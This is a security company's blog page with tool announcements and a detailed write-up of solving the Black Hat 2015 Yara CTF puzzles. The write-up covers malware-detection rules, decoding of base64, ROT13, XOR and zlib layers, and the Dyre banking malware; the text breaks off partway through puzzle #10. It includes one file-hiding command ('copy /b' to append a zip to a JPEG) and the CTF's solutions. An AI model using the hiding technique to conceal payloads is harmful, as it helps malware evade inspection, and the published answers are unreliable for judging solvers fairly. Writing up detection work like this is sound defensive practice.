The WebJob framework is an open source client-server solution that acts as a force multiplier for anyone who needs to automate various tasks or work on an enterprise scale. It does this by enabling engineers to run arbitrary programs and/or scripts on a wide array of operating systems (e.g., UNIX®, Linux®, Mac OS®, Windows®, Android®, etc.). The results, if any, can be aggregated and collated on the WebJob server where they can be operated on in bulk. With the flexibility that the framework provides, administrators who are inclined to write their own scripts can achieve a high level of automation and efficiencies of scale. With the WebJob framework, you can effectively do more with less.

Please click the link below to read more about how the framework could be the next generation endpoint security solution for you.


The WebJob Framework: A Generic, Extensible, and Scalable Endpoint Security Solution

MASTIFF Online Updated to Add pyOLEScanner

The MASTIFF Online site was updated on 2015-06-05; the update included the following:
  • Enabled the pyOLEScanner version 1.2 tool as part of processing samples. pyOLEScanner is a Python-based script written by Giuseppe 'Evilcry' Bonfa and inspired by OfficeMalScanner. It scans office documents in order to assess whether they could be malicious. Within MASTIFF Online the plugin is only executed for office document file types (a.k.a., "Office"), and the results of the plugin can be seen by clicking on the "office-analysis" record in the detail pane for those file types.
  • Added an "x" icon next to the GUI search box which clears the search box text and refreshes the list when clicked.
We will re-process samples when necessary (e.g., after a MASTIFF upgrade or plugin addition) and as time allows. In this case the existing samples have been re-processed so that they now have the new plugin results.

Giles at Black Hat and in the ISSA Journal

The Giles production rule system compiler (which we described here) has gotten some good press lately!

An article describing Giles and its use has been published in the June 2015 issue of The ISSA Journal, which can be seen by subscribers here. The ISSA Journal is the official journal of the Information Systems Security Association, and we're very proud to have an opportunity to discuss Giles on its pages. The article describes what Giles is, how to use it, and how to use the engines it creates. It also talks a little bit about how it works under the hood.

Also of note, I will be presenting a talk about Giles at this year's Black Hat USA in Las Vegas on August 1-6th. This talk will describe the reasons behind the creation of Giles, how it works, and how it can help you build efficient, simple event correlation engines and expert systems. Let us know if you're going to be at Black Hat this summer; we hope to see you there!

And remember, Giles is open source, so be sure to check it out (both in the look-at-it sense and in the grab-a-copy-of-its-code sense) at https://git.korelogic.com/giles.git/.

Hacking Team Documents Claim BIOS-based Persistence

A search through the online mirror of the information stolen from Hacking Team shows indications that a BIOS-based infection capability was developed as part of the Remote Control System software. This may be the first time a commercial spyware product claims this type of capability.

LibPathWell 0.6.1 Released

I am thrilled to announce the first public release of the Password Topology Histogram Wear-Leveling (PathWell) library and PAM module for dynamic password-strength enforcement. Version 0.6.1 is available for download here.

We have blogged and written and presented about PathWell several times, but now we've finally dropped the code.

The LibPathWell release is a PAM module and supporting library to implement password topology complexity enforcement. There is a static component called blacklisting that allows you to seed the PathWell database with the most popular password topologies, so instead of an attacker cracking 25%+ in their first few mask attacks, they get zero. And then there are dynamic components ensuring that enterprise users, as they change their passwords, are forced to choose new passwords that are substantially different from one another.

tl;dr: PathWell makes enterprise user passwords 5-6 orders of magnitude harder to guess!

This release is not the current code. It is basically the last version cut at the end of our DARPA-sponsored CFT (Cyber Fast Track) project, with an appropriate open-source license applied. We've been working on making PathWell more user-friendly, like the password creation guidance I alluded to at the end of the presentation linked above.

But that code isn't done yet, and we got tired of the existing code not being available to the public, so here it is.

License

LibPathWell is released under the GNU Affero General Public License Version 3 (AGPLv3). See the README.LICENSE file in the distribution tar ball for all the legalese - basically this is just like the GPLv3 except that it also explicitly applies to network services that users interact with (without "running" programs in the conventional sense). There is a patent on the topology wear leveling stuff; use of that is granted by the software license as long as you comply with it. If you want to implement PathWell in a commercial operating system, website, or Identity Management product in a way that isn't compatible with AGPL (i.e., closed-source), or you want us to do so, talk to us.

Known Issues

This branch was effectively frozen in late 2013. Since then, some current Linux distributions' dependencies have changed. Everything works great on current Gentoo, but you may encounter header file issues with recent versions of some of the other distributions (e.g., Ubuntu) listed in README.INSTALL as supported. Meanwhile, some distributions whose libraries were too old at the time (I'm looking at you, RHEL) may now work out of the box, so our documentation needs updating. We'll push those fixes to the public git repository as we can, but probably not before DEFCON; we have a contest to run. Be sure to watch our git repository, or better still, submit some patches. ;)

Mushy Stuff

I can't thank enough my coworkers who did more to make PathWell an actual thing than I did. Particularly Klayton, Sean, and Mick; without your efforts and persistence this would just be another idea rotting in the back of my brain while I chase squirrels.

How I Solved (Most Of) the Yara CTF Puzzles: Puzzle #1 - #4

Ron Tokazowski of phishme.com put together a Yara Capture The Flag (CTF) contest for Black Hat 2015. This CTF consisted of 11 logic and Yara-based puzzles that participants had to solve for a chance to win a DJI Quadcopter. The best part is you could participate in the CTF even if you weren't at Black Hat!

I participated in the CTF and won!!! I got through 10 out of 11 puzzles; why I did not complete the 11th is explained later. This post, as well as two more, describes how I went through each puzzle and solved them. The puzzles are still accessible at the CTF page, so be warned that spoilers are below!

Capture the Flag contests are an important resource for anyone in information security. When performed correctly, they help to increase your skills and expand your methods and techniques for solving problems. There has never been a CTF from which I haven't learned something, and because of this I try to do as many of them as my schedule allows.

In each puzzle I present in these posts, I'll go through my thought process for how I solved it. Understand that there are probably better ways to solve these, but when you are in a timed contest you go where your mind takes you, which sometimes leads down incorrect or inefficient paths.

As stated, the Yara CTF consisted of 11 challenges that had to be solved. The CTF also came with an email template that listed what needed to be provided for each puzzle solution.

Puzzle #1

The first puzzle was in a 1.2MB file named "all about that base" and the goal was to find a key contained within. The contents of the file were an alphanumeric pattern in one line that ended with the following:

...WFZtMUtSbE5zV2xWV1ZrWXpWVVpGT1ZCUlBUMD0=

Anyone doing CTF challenges should know that when dealing with encoded data there are a few things you should always look for. The first is Base64 encoded data. Data encoded with Base64 consists of upper- and lower-case letters, numbers, the plus sign, and the forward slash. More importantly, it will often end in a single or double equal sign, as does the string above.

Base64 decoding the string returned another base64 encoded string. Decoding that gave another base64 encoded string, which gave another base64 encoded string, and so on. The goal was to get to the bottom of all the base64 encoded strings - which I could either do manually, or write a small shell script. I went with the script.

#!/bin/bash

cat "all about that base" | base64 -d - > _tmp
while [ $? -eq 0 ]; do
  mv _tmp still_decode
  cat still_decode | base64 -d - > _tmp
done
mv still_decode decoded.txt

This script runs the command "base64 -d" in a loop to decode the data until it fails. Once this occurs, we know we are done decoding the data and hopefully have the decoded version.

The final file that was created was 1,657 bytes long and contained a nice ASCII art of a unicorn and the answer. I won't spoil this answer so you can try it on your own.

Puzzle #2

The second puzzle contained an encrypted RAR archive and a readme file. According to the readme, the goal was to identify the import hash, PE timestamp, and PE machine for the file in the RAR archive and create a Yara rule for it.

Windows executables are organized in a specific format known as the Portable Executable (PE) format. This format gives the operating system information about the executable, including where to start execution in the program, and what libraries and APIs should be loaded. Two of the fields the puzzle asks for, the PE timestamp and PE machine, are located in the PE header.

The PE timestamp, also called the TimeDateStamp, usually contains the time when the executable was linked during the compilation process. This field is often used by analysts to determine how old the executable is. However, be warned! This value can easily be changed by attackers.

The PE machine is a field that specifies the CPU type the executable can run on. For example, if it's a 32-bit executable, it will likely have the value 0x14C (IMAGE_FILE_MACHINE_I386).

This information can be found with any number of PE header analysis tools. I used pecheck.py, a script written by Didier Stevens that uses the pefile Python library to dump all of the PE header information. Using this I was able to quickly find what the PE timestamp and machine values were:

$ pecheck.py my_file.exe 
PE check for 'my_file.exe':
Entropy: 6.913703 (Min=0.0, Max=8.0)
MD5     hash: 75c0cd3b15b1b67de14f4e97eafa3679
SHA-1   hash: 157ad48ab9f1bf257627272d16e83fe748d16985
SHA-256 hash: 659c865cfc57226fafd40a97f4fc21a0e5b828ab6f9bdcb3ca0de175b654a68b
...
[IMAGE_FILE_HEADER]
0xEC       0x0   Machine:                       0x8664    
0xEE       0x2   NumberOfSections:              0x3       
0xF0       0x4   TimeDateStamp:                 0x4F304133 [Mon Feb  6 21:08:03 2012 UTC]
...

The timestamp has a value of 0x4F304133 and the machine type is 0x8664 (IMAGE_FILE_MACHINE_AMD64).

The import hash is a hash that is created by examining the Import Address Table of an executable, which describes the DLLs and APIs that the executable wants to load. Since many executables place this information in a unique order, this hash can be used to identify and track related malware samples or attackers. To generate the import hash, I used Florian Roth's ImpHash-Generator script.

$ python imphash-gen.py -p my_file.exe
###############################################################################
 
  IMPHASH Generator
  by Florian Roth
  January 2014
  Version 0.6.1
 
###############################################################################
Reading DB: 37694 imphashes found
IMP: bb916724e1b87e3af628b2f59174d064 MD5: 75c0cd3b15b1b67de14f4e97eafa3679 FILE: my_file.exe
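As an aside, the same three values can also be pulled programmatically with the pefile library; a quick sketch against the same sample:

import pefile

pe = pefile.PE("my_file.exe")
print(hex(pe.FILE_HEADER.Machine))        # 0x8664
print(hex(pe.FILE_HEADER.TimeDateStamp))  # 0x4f304133
print(pe.get_imphash())                   # bb916724e1b87e3af628b2f59174d064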

Now that I had the data needed, the Yara rule had to be created. Fortunately, the latest versions of Yara come with a PE module that allows rules to directly reference these values, as well as a function that generates the import hash! The resulting Yara signature is shown below:

import "pe"

rule PM_Yara_CTF_2015_2
{
	meta:
		author = "thudak@korelogic.com"
		comment = "Solution 2"
	condition:
		pe.machine == 0x8664 and 
		pe.timestamp == 0x4F304133 and 
		pe.imphash() == "bb916724e1b87e3af628b2f59174d064"
}

Two things to note. Initially when I created this rule I was using Yara 3.3.0. For some reason, pe.imphash() would not run correctly. However, after upgrading to Yara 3.4.0 (the latest version at the time), things worked fine.

Also, the rule is checking for the actual value of pe.machine. The Yara PE module has a number of definitions available to make the rules more readable. Therefore, the rule could also have been written "pe.machine == pe.MACHINE_AMD64".

Puzzle #3

The third puzzle was a file named "take off every zig" whose contents were an encoded string that contained a key:

Bar bs gurz unf gb or rnfl gb znxr lbh xrrc tbvat.
Lbhe nafjre vf: ZneznynqrFrzncuberErpvqvivfgVyyvgrengrXhzdhngTbbsonyy

Because there were spaces in the string, I knew it was not likely to be base64 encoded. The spaces also told me it was probably not XOR encoded, another common encoding method we'll talk about later.

Why did the spaces tell me this? Both of these encoding techniques would have encoded the entire string, including spaces. It was quite possible that the attacker was being tricky and had written a custom algorithm to skip spaces, and I kept that in the back of my mind. In the meantime, I decided to go with my gut and try something else: ROT13.

ROT13 is a Caesar cipher, or a substitution cipher in which all letters are rotated by 13 letters (or half the English alphabet). To test this out, I used the website www.rot13.com, pasted the string and pressed the decode button...

...and Voila! It worked! The result gave me the key I needed for the answer.
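If you would rather not paste potentially sensitive data into a website, the same rotation can be done locally; a short Python sketch, using the puzzle's file name from above:

import codecs

# ROT13 is its own inverse, so decoding and encoding are the same operation.
with open("take off every zig") as f:
    print(codecs.decode(f.read(), "rot_13"))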

Puzzle #4

Puzzle #4 contained three phishing emails, along with their mail headers, for which we were supposed to create one Yara rule to detect them all. To do this, I examined each email looking for items that were common to each other but unique to these emails. I came up with three things: the subject line, the attachment filename, and the message body.

There were other locations I could have used, such as the sender or the source MTA. However, these didn't have any common attributes between the three emails; the other items did.

The subject lines of all three emails were as follows:

  • 1.eml:Subject: Resume
  • 2.eml:Subject: resume
  • 3.eml:Subject: =?utf-8?Q?Re=3AMy_resume?=

The first two are just the word "resume", in different case, while the last is a MIME encoded-word (RFC 2047) form of "Re:My_resume". The common word between all three is "resume" and thus I had my first string to search for. I decided to use a regular expression to search for "Subject: ", followed by any number of characters, and then the word resume where the 'r' could be upper or lower case.

  • $subject = /Subject: [\S\s]+[rR]esume/

Next was the attachment file name. The three emails named their files as follows:

  • 1.eml:Content-Disposition: attachment; filename="my_resume.zip"; size=462;
  • 2.eml:Content-Disposition: attachment; filename="my_resume.zip"; size=460;
  • 3.eml:Content-Disposition: attachment; filename="=?utf-8?B?bXlfcmVzdW1lLnppcA==?="

The first two emails have the name just as "my_resume.zip". The last is also named my_resume.zip, but the filename is base64 encoded. Since Yara does not have any base64 encoding or decoding functions, I would have to create two strings to search for both versions of the filename.

  • $filename = "my_resume.zip"
  • $file_b64 = "bXlfcmVzdW1lLnppcA=="
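The encoded form of the filename is easy to generate for the rule; for example, with a line of Python:

import base64

# Generate the base64 form of the attachment name to paste into the rule.
print(base64.b64encode(b"my_resume.zip").decode())  # bXlfcmVzdW1lLnppcA==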

Finally, the message bodies of the emails. The first two email bodies were base64 encoded while the last was in plaintext. The plaintext version is below.

Hello my name is Ariana
 attach is my resume
I would appreciate your immediate attention to this matter

Sincerely
Ariana

Of course, all three were just slightly different. In each email, the name and the third lines were completely different. Additionally, in one email the second line stated "attached" instead of attach. Finally, the first word was "Hello" in two of the emails and "Hi" in the final email.

Looking for a common string between all three emails, I found that my best bet would be to search for "my name is". This would also mean I would have to search for the plaintext and base64 encoded versions of the string. The plaintext was easy, but the base64 was a little more difficult due to the position of the first word. However, I got lucky and found that part of the base64 encoded version of "my name is", namely "bXkgbmFtZSBpc", was present in both base64 encoded versions of the email bodies. This allowed me to create the final strings for the Yara rule.

$hello = "my name is"
$hello_b64 = "bXkgbmFtZSBpc"
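
To see why only part of the encoding is stable, remember that base64 works on 3-byte groups, so the characters produced for "my name is" depend on its byte offset within the body. A small sketch (with made-up bodies, since only the offsets matter) shows that whenever the phrase starts at an offset divisible by three, the same "bXkgbmFtZSBpc" characters appear:

import base64

# Hypothetical bodies -- in both, "my name is" happens to start at a multiple of 3.
bodies = [b"Hello my name is Ariana", b"Hi my name is Bob"]
for body in bodies:
    encoded = base64.b64encode(body)
    print(encoded, b"bXkgbmFtZSBpc" in encoded)   # True for both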

The final Yara rule looked as follows:

rule PM_Yara_CTF_2015_4
{
	meta:
		author = "thudak@korelogic.com"
		comment = "Solution 4"
	strings:
		$subject = /Subject: [\S\s]+[rR]esume/
		$filename = "my_resume.zip"
		$file_b64 = "bXlfcmVzdW1lLnppcA=="
		$hello = "my name is"
		$hello_b64 = "bXkgbmFtZSBpc"
	condition:
		$subject and ($filename or $file_b64) and ($hello or $hello_b64)

}

More to come!

This is long enough for one post. In the next post, I'll reveal how I solved puzzles 5-8!

How I Solved (Most Of) the Yara CTF Puzzles: Puzzle #5 - #8

Previously, I posted how I solved puzzles #1-#4 of the Yara CTF for Black Hat 2015, sponsored by phishme.com. In this post, I'll go into how I solved puzzles #5-#8.

As noted before, the puzzles are still accessible at the CTF page, so there are spoilers if you plan to go through them.

Puzzle #5

The fifth puzzle consisted of a zip archive named "cyber apt cloud attack simulation.zip" and a readme file. Within the archive were two files named "bad.exe" and "bad2.scr". The readme read:

Many times, attackers will use zip files in order to contain their malware to help
avoid detection. Create a rule that would look for this type of behaviour.

The solution to this was to create another Yara rule, so I took that to mean a Yara rule that would detect exe or scr files within a zip archive. In order to do that, I would need to look at the specification for the zip archive format. I used two references: Wikipedia and the specification from PKWARE.

When creating the Yara rule, we first have to make sure we're dealing with a zip archive. According to the specification, zip files should begin with a local file header, the structure that describes each file in the archive. This structure begins with the little-endian hex number 0x04034b50. Note that when looking at it in a hex editor, you'd actually see the bytes in reverse order: 50 4B 03 04.

Yara has a few commands that will allow you to obtain a string or value from a specific offset within a file. Since the spec says the signature will be at the first byte of the zip archive, we can write a Yara condition to see if our signature is at byte 0. The uint32() Yara command will return an unsigned little-endian 32-bit integer at a specific offset. Using that, the rule can test for the zip archive signature:

uint32(0) == 0x04034b50

A zip archive will also have a local file structure for each file in the archive. The local file structure contains information such as the compressed and uncompressed file sizes, the compression method, and the file name. Since our goal is to find file names that contain ".exe" or ".scr", we'll need to parse through every local file header, find the file name (which starts at offset 30), and see if it contains either extension.

Yara allows us to do this by using the for .. in condition to iterate through strings found in a file. By iterating through all local file header values, we can jump to the file name offset and search it for the extensions we are looking for.

To do so, we first need to create a string of the local file header signature:

$local_file = { 50 4b 03 04 }

Then we instruct the Yara rule to loop through each instance of this value, or the start of each local file header, in the archive we are examining:

for any i in (1..#local_file):
 	( $ext_exe in (@local_file[i]+30..@local_file[i]+30+uint16(@local_file[i]+26)) or
	  $ext_scr in (@local_file[i]+30..@local_file[i]+30+uint16(@local_file[i]+26))
	)

Breaking this down, we are looping through each instance of the local file header with the for any i in (1..#local_file) statement.

Remember that the file name starts 30 bytes after the start of the header, which we can specify with @local_file[i]+30. (The @variable[i] format in Yara returns the location of the i-th instance of a string.)

The length of the filename is stored 26 bytes after the start of the header, which we can get with uint16(@local_file[i]+26). This reads the two bytes at that location as an unsigned little-endian 16-bit integer.

Thus by using these two values, we know where the file name starts and stops. We can search this space for the ".exe" and ".scr" extensions using the in keyword and specifying the start and stop of the filename.
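
Outside of Yara, the same walk can be sketched in a few lines of Python to sanity-check the offsets the rule relies on (the archive name below is the one from the puzzle):

import struct

def list_zip_entries(path):
    # Walk each local file header (PK 03 04) and print the stored file name.
    data = open(path, "rb").read()
    pos = data.find(b"PK\x03\x04")
    while pos != -1:
        name_len = struct.unpack_from("<H", data, pos + 26)[0]   # uint16 at header offset 26
        print(data[pos + 30 : pos + 30 + name_len].decode(errors="replace"))  # name at offset 30
        pos = data.find(b"PK\x03\x04", pos + 4)

list_zip_entries("cyber apt cloud attack simulation.zip")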

The final Yara rule became the following:

rule PM_Yara_CTF_2015_5
{
    meta:
        author = "thudak@korelogic.com"
        comment = "Solution 5"

    strings:
        $local_file = { 50 4b 03 04 }
        $ext_exe = ".exe" nocase
        $ext_scr = ".scr" nocase

    condition:
        // look for the ZIP header
        uint32(0) == 0x04034b50 and
        // make sure we have a local file header
        $local_file and
        // go through each local file header, find the filename,
        // and see if it has an extension we are looking for
        for any i in (1..#local_file):
        ( $ext_exe in (@local_file[i]+30..@local_file[i]+30+uint16(@local_file[i]+26)) or
          $ext_scr in (@local_file[i]+30..@local_file[i]+30+uint16(@local_file[i]+26))
        )
}

Puzzle #6

This puzzle was evil.

Contained within this puzzle was a jpeg of Austin Powers and a readme.txt file that stated "Good luck!" The solution to this puzzle was a Yara rule, and the answers to the questions "How's it encoded?" and "What's the filename inside?" To me, this meant that there was a file hidden inside the image. In other words, steganography!

Admittedly, this puzzle took me a while because I kept going in the wrong direction. I had convinced myself that a stego program had been used to hide a file inside the image. When steganography is suspected, there are a few tools that can detect which steganography program was used. Unfortunately, these all came back with no results. This meant I was either going in the wrong direction or had to find a different stego program. I started with the latter, searching the Internet for any stego program I could find and trying each one against the image. Once again, no results.

After too long, I decided to try a different approach and read over the JPEG file format. It turns out that JPEG images, like some other file formats, have a specific marker to indicate the end of the file. For JPEGs, this is the value 0xFF 0xD9. A quick examination of a dozen or so JPEGs on my local system showed this was the case - all ended in 0xFF 0xD9. Interestingly, the JPEG in the puzzle did not.

I pulled up the JPEG in a hex editor and found 233 bytes present after the end of file marker, marked in green in the image below. While this could have been bytes thrown there by the image creation software, it was worth pursuing.

There is a technique for copying files to the end of an image using the copy command in Windows. Using the command below, you can combine two files together (original.jpg and hidden.zip) and place them in a new file (newimage.jpg). This is an effective, and simple, way to hide one file at the end of another.

copy /b original.jpg + hidden.zip newimage.jpg

I extracted the extra bytes from the jpeg and examined them. From the answer template I knew it was encoded in some fashion, so I needed to figure out what encoding was used. In the last post, I mentioned that when you do puzzles like this there are always a few things to look out for. The first is base64 encoding, which this was not, given the presence of non-ASCII characters. The second is XOR encoding.

XOR (exclusive or) is a mathematical operation that is commonly used to hide data. While we don't need to get into the details of XOR, there are a couple properties of XOR that you should remember.

  1. A XOR K = C and C XOR A = K. That is, if you XOR a value (A) with a key (K) to get ciphertext (C), you can get the key (K) by XOR'ing the ciphertext (C) with the original value (A).
  2. Anything XOR'd by zero (0) is itself.

These two properties can be used to determine the XOR key that was used to encode data, assuming XOR was used. If we can guess what some of the values of the file may be, such as a file signature, we can apply those values to the file and see if we get something that looks like a key. For example, if we thought this was a PE executable, we could XOR the first two bytes by MZ, which is the signature of a PE executable, and see if we found a repeating pattern. This is usually a hit or miss operation and can be time consuming. Fortunately, there is an easier way.

Anything XOR'd by 0 is itself. So, if there were locations in a file containing only 0s and an XOR key was applied to it, then the key itself would be revealed. Guess what? Most binary files have places in them that contain only zeroes. We only need to look through the encoded data for any patterns and try those patterns as our key.
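
As a rough illustration of that shortcut, the sketch below (the dump file name is hypothetical) counts byte frequencies, tries the most common byte as the key, and checks whether the result starts to look like a known file type:

from collections import Counter

blob = open("extra_bytes.bin", "rb").read()       # hypothetical dump of the 233 trailing bytes
likely_key = Counter(blob).most_common(1)[0][0]   # long runs of a single byte often expose the key
decoded = bytes(b ^ likely_key for b in blob)
print(hex(likely_key), decoded[:4])               # a zip archive would begin with PK\x03\x04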

Looking at the encoded data, you'll notice there are some large areas of the letter B (0x42). This could be our XOR key. Using a hex editor, I applied the value 0x42 to the entire file to see what happened:

The result should look familiar - a Zip archive! In the image above, we can see that not only did it decode, but the filename inside was malicious.exe! This answered our first two questions - how the file was encoded and what the file name was. Now onto the Yara rule.

The contest didn't specify what the Yara rule should be, so I decided to create one that detected JPEGs that had extra data at the end. This is shown below.

rule PM_Yara_CTF_2015_6
{
	meta:
		author = "thudak@korelogic.com"
		comment = "Solution 6 - finds data after the jpeg final marker"

	strings:
		$header = { ff d8 ?? ?? ?? ?? 4A 46 49 46}

	condition:
		// JPEGs should always end with 0xffd9 - if not, there is something else there
		$header at 0 and uint16(filesize-2) != 0xd9ff

}

The rule first looks for the JPEG header, to ensure we are looking at a JPEG image. JPEG headers start with the value 0xFF 0xD8, followed by the JFIF APP0 marker segment. The first 4 bytes of this segment contain an APP0 marker and the length of the segment. From looking at multiple files, these weren't always the same values (even though I suspect they should be). After those bytes are the characters "JFIF", or 0x4A 0x46 0x49 0x46 in hex. This is how the $header string for the rule was created.

Next the rule looks to see if the last two bytes of the file are the end of file marker, 0xFF 0xD9. Yara provides a keyword, filesize, which holds the size of the file being scanned. Since the last two bytes of the file are supposed to contain the end of file marker, we can extract those bytes using uint16(filesize-2) and see if they match. If they don't, we've found extra data at the end of our image.

Note that in the Yara rule, we are testing for 0xd9ff - a reversal of the end of file marker. This is because uint16() reads the bytes as a little-endian integer, so the values are reversed. Alternatively, I could have used the Yara function uint16be() to read the bytes in big-endian order and compared against 0xffd9.
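
As a quick sanity check outside of Yara, the same test can be written by reading the last two bytes in their natural order (the image name here is hypothetical):

def has_trailing_data(path):
    with open(path, "rb") as f:
        data = f.read()
    # JPEGs should end with the end-of-image marker FF D9
    return not data.endswith(b"\xff\xd9")

print(has_trailing_data("austin_powers.jpg"))   # hypothetical name for the puzzle image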

Puzzle #7

The next puzzle consisted of two more zip files, named encrypted_zip.zip and not_encrypted.zip, and a readme that instructed us to create a Yara rule that would detect the encrypted zip file, but not the unencrypted one.

Luckily, I had a slight advantage on this one. In my work on MASTIFF, I had created a plug-in that would analyze the structure of a zip archive, so I already knew how files were marked as encrypted or not.

Six bytes into the local file header, the structure kept for each file, is a field called the general purpose bit flag. This field will set specific bits to describe various options for the file within the archive. There is one bit in that field we need to examine: bit 0. If set, this bit signifies the file is encrypted.

By creating a Yara rule that looks at this field for each local file header, we can perform a boolean AND operation to see if the bit is set. If it is, then the file is encrypted. The resulting Yara rule is shown below:

rule PM_Yara_CTF_2015_7
{
    meta:
        author = "thudak@korelogic.com"
        comment = "Solution 7 - encrypted zip file"

    strings:
        $local_file = { 50 4b 03 04 }

    condition:
        // look for the ZIP header
        uint32(0) == 0x04034b50 and
        // make sure we have a local file header
        $local_file and
        // go through each local file header and see if the encrypt bits are set
        for any i in (1..#local_file): (uint16(@local_file[i]+6) & 0x1 == 0x1)		
}

Look familiar? It should, because I essentially copied the Yara rule from puzzle #5 and modified it slightly.

In this rule, we are checking to ensure we are dealing with a zip archive, and then going through each local file header and examining the general purpose bit field that is 6 bytes from the start of the header. The bit field is AND'd with 0x1 and checked to see if the result is 0x1. If it is, we know the encrypted bit was set and our rule should fire.

A small side note

Confession time. The Zip Yara rules for puzzles 5 and 7 are not the same ones I turned in. As I was writing this up, I realized that my original rules were matching on both the central directory file header and the local file header in the zip files. This isn't a problem by itself, except that the offsets for the file names, lengths, and general purpose bit flag are different in the central directory and local file headers.

For puzzle #5, this wasn't an issue, as I was using the offsets for the local file headers as I should have been; the rule was just doing a little extra work when it found a central directory file header. For puzzle #7, the rule was only reading the general purpose bit flag at the central directory file header's offset of 8. While the rule would still work, since the encryption bit is also set in the central directory file header, it could create a number of false positives, so it has been corrected above. Sorry.

Puzzle #8

The final puzzle in this post was a tricky one, as I went down a path that in the end wasn't needed. This puzzle contained a minidump crash report named some_file.dmp, and the instructions to create a Yara rule and answer the questions "What's the malware?" and "What's the configuration data?".

As I was unfamiliar with minidump files, I had to do some initial research. Minidump files contain information about a system and its processes at the time the minidump was created, typically when a process or system has crashed. In other words, they contain portions of the memory from the system. By analyzing the minidump, we have a view into the compromised system to hopefully determine what the issue was. The way I chose to analyze the file was to use WinDbg.

After loading the minidump file into WinDbg, I ran a number of commands, such as "!analyze -v", that told me this was a crash dump of explorer.exe. For my purposes, this meant we were dealing with malware that either had renamed itself as explorer.exe or had injected itself into explorer.exe. Additional commands did not show me anything unusual, such as oddly named DLLs. Admittedly, my WinDbg skills are not the sharpest, as I prefer other debuggers, so I may not have run some commands that would have given me more clues.

However, on a hunch I ran a string search for the string "serverlist". Often in these types of contests, you'll get a gut feeling on what to search for. You have to follow your gut and see if you are right - if you are it can pay off tremendously. In this case I got lucky and my search paid off.

From the puzzle questions, I knew I was looking for malware that had a configuration file. From the minidump analysis, I had explorer.exe. The only malware I could quickly think of that utilized both was Dyre, a popular banking malware that injects itself into explorer.exe and has a configuration file. The string "serverlist" is one of Dyre's configuration file commands.

Upon finding the string "serverlist", I knew we were dealing with Dyre and just had to pull out its configuration file. After a few searches and missteps, one of which involved trying to get Volatility to read minidump files, I found a Python script by phishme.com to extract the Dyre configuration file from memory crash dumps! This script successfully extracted the configuration file from the crash dump.

For the Yara rule, I decided to focus on the Dyre configuration file since it has a number of static configuration options that can be easily detected. The resulting rule is below.

rule PM_Yara_CTF_2015_8
{
    meta:
        author = "thudak@korelogic.com"
        comment = "Solution 8 - look for dyre config"

    strings:
        $ = "<serverlist>"
        $ = "<server>"
        $ = "</server>"
        $ = "</serverlist>"
        $ = "<rpci>"
        $ = "</rpci>"
        $ = "<litem>"
        $ = "</litem>"

    condition:
        all of them
}

More to come!

In my opinion, puzzles 5 through 8 were the most challenging of the CTF. They did what good CTF puzzles should do - they made you think and work down paths that many would not normally go down (at least until they have experienced them). Most importantly, they used techniques that analysts and responders are likely to encounter in their daily work.

Next up, the last three puzzles!

How I Solved (Most Of) the Yara CTF Puzzles: Puzzle #9 - #11

So far I've discussed how puzzles #1-#4 and puzzles #5-#8 in the Yara CTF for Black Hat 2015 contest were solved. In this post, I'll go over the final three puzzles.

As noted before, the puzzles are still accessible at the CTF page, so there are spoilers if you plan to go through them.

Puzzle #9

Puzzle #9 contained a single file named strangers composed of one long base64 encoded string. A "key" was required for the answer. Decoding the string returned 571 bytes of binary data.

I initially opened the data in a hex editor and started looking for patterns. Patterns can often be indicative of XOR obfuscation and may lead you to an XOR key. Unfortunately, after a few minutes of this I hit a wall and needed to change my train of thought.

I had run the UNIX command file over the binary data in the hopes it might identify a specific file type. This didn't work, so I decided to google the first few bytes of the data in case it was a known file header that file didn't detect. Fortunately, searching for "78 9C" had a number of hits indicating this was the header for data compressed with the zlib algorithm (with default compression)!

Zlib is a commonly used data compression algorithm. Many tools are available to decompress encoded data, such as gzip. However, tools like gzip require a gzip header to decompress the data, which wasn't present here. The solution? Add our own header and decompress:
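
My approach was to prepend a gzip header so standard tools could handle the stream. An equivalent (and simpler) route, sketched below with the puzzle's file name, is to let Python's zlib module decompress the raw stream directly:

import base64
import zlib

encoded = open("strangers").read()        # the puzzle file: one long base64 string
blob = base64.b64decode(encoded)          # 571 bytes beginning with 0x78 0x9C
print(zlib.decompress(blob).decode())     # prints another base64 encoded string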

The result was another base64 encoded string. Decoding that gave the following message:

Oooh \ We're no strangers to love \ You know the rules and so do I \
A full commitment's what I'm thinking of \ You wouldn't get this from any other guy \
I just wanna tell you how I'm feeling \ Gotta make you understand \ Never gonna give you up \
Never gonna let you down \ Never gonna run around and desert you \ Never gonna make you cry \
Never gonna say goodbye \ Never gonna tell a lie and hurt you . Oh yea, about The game. And for
those who know "The game"...yup, you just lost. But back to this game. The real game. What is
the MD5 hash of a1d0c6e83f027327d8461063f4ac58a6 and 69cbe89bfa6370e0ab07df9a6096d3d2. No spaces,
no end lines...just yummy hex goodness.

Now the file name strangers made sense. However, we weren't finished. We still needed to figure out what the hashes in the message were, combine those values, and create an MD5 hash of that.

The two hashes in the output are MD5 hashes themselves. Since MD5 is a cryptographic hash, there is no way for me to reverse the hash into its original value. That means I would normally have to treat these like password hashes and brute force different values until I got the hashes I was looking for. Fortunately, there are many sites that have already generated MD5 hashes for lists of many different words and values. The solutions, therefore, were just a google search away.

Through some online searches, it turned out that "42" produces the MD5 hash a1d0c6e83f027327d8461063f4ac58a6, and "yesnomaybe" produces the MD5 hash 69cbe89bfa6370e0ab07df9a6096d3d2.

Combined as "42yesnomaybe", we produce our answer, the MD5 hash e71c9f0afccd29db1dc70daa9ea6e84b.

Puzzle #10

The goal of puzzle #10 was to obtain an "answer". The only file available was named "cute animal" and was the following string:

1b2d37622f37313662252d62243730362a2730622b2c362d62362a2762302320202b36622a2d2e276e620a23
2c6c620d2c2e3b62362a272c62352b2e2e623b2d3762242b2c2662362a276236303727622130272336373027
78627b2172777370747026727b7b26267b7076772026777026247a717b74737074754242

This string consists only of hex characters - 0-9 and a-f. While this could have been a base64 encoded string (it does decode properly, albeit into binary goo), it was more likely a string of hex bytes. This seemed even more likely because the resulting byte values fall largely within the printable ASCII range. Using a small Perl script I wrote, I converted the hex into its byte values and got the following:

00000000  1b 2d 37 62 2f 37 31 36  62 25 2d 62 24 37 30 36  |.-7b/716b%-b$706|
00000010  2a 27 30 62 2b 2c 36 2d  62 36 2a 27 62 30 23 20  |*'0b+,6-b6*'b0# |
00000020  20 2b 36 62 2a 2d 2e 27  6e 62 0a 23 2c 6c 62 0d  | +6b*-.'nb.#,lb.|
00000030  2c 2e 3b 62 36 2a 27 2c  62 35 2b 2e 2e 62 3b 2d  |,.;b6*',b5+..b;-|
00000040  37 62 24 2b 2c 26 62 36  2a 27 62 36 30 37 27 62  |7b$+,&b6*'b607'b|
